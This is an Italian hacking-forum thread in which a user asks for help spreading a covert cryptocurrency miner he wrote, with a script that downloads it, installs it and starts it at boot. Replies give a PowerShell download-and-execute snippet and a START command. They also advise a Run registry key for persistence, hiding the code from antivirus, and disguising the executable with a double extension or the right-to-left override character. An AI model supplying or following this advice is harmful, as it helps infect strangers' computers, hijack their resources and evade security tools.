Discussione Malware script per virus (installazione...)

[ema_]

Ciao a tutti, ho appena finito il mio primo "virus", è un silent miner molto elementare.
Ora volevo creare uno script (da bindare su magari .png, pdf o altro) che dovrebbe: scaricare il miner da zippyshare, installarlo e far in modo che venga avviato ad ogni boot del sistema.
Purtroppo non ho la minima idea di come realizzare questo script.
Vi sarei grato se qualcuno di voi mi potesse aiutare.
Grazie a tutti.

 

[xzero]

Ciao, premetto che non so come aiutarti, ma volevo chiederti, come sei messo a rilevamento antivirus? Un silent miner non penso passi inosservato anche al peggiore degli antivirus. Io per far 'accettare' miner js (quindi senza nessuna installazione ma lavorando da browser) ad antivirus ho dovuto fare un lavoro immane e con alcuni antivirus proprio non c'è stato verso.

 

[ema_]

Ciao, premetto che non so come aiutarti, ma volevo chiederti, come sei messo a rilevamento antivirus? Un silent miner non penso passi inosservato anche al peggiore degli antivirus. Io per far 'accettare' miner js (quindi senza nessuna installazione ma lavorando da browser) ad antivirus ho dovuto fare un lavoro immane e con alcuni antivirus proprio non c'è stato verso.

Per ora l' ho provato con kaspersky e stranamente non ha dato problemi

 

[xzero]

Posso chiederti che miner utilizzi ? Cpuminer ?

 

[Informaticage]

Per scaricare la soluzione migliore è uno script powershell:

$client = new-object System.Net.WebClient
$client.DownloadFile(“Download Link”,“File Destination\file name.file extension”)

Puoi sempre con uno script in powershell eseguire poi il file scaricato o un semplice comando batch come

 START filename.exe

 

[WarCrimeLover69]

Per l'avvio al boot ti conviene scrivere una chiave di registro col path del file in Windows/CurrentVersion/Run (non è il path preciso ma se cerchi su google trovi quello giusta), per scaricare il file dipende da che linguaggio usi, in ogni caso se non sei un masochista e vuoi restare sul nativo è abbastanza facile scaricare un file ed eseguirlo.

Stai comunque attento a non far beccare il "downloader" dagli antivirus, camuffa il meglio che puoi la funzione che scrive sul registro.

Per l'estensione invece ci puoi fare poco, a meno che non usi qualche exploit per i .doc (che non funzionano comunque ovunque ma solo su certe versioni di word) o pdf o quello che riesci a trovare, ti conviene provare col caro e vecchio file.jpg.exe (in quanto le estensioni conosciute vengono nascoste di default) oppure un semplice "cod.scr" mettendoci davanti il carattere Unicode che forza la scrittura da destra verso sinistra U+202E (il risultato sarebbe "rcs.doc" (scr è uguale ad exe))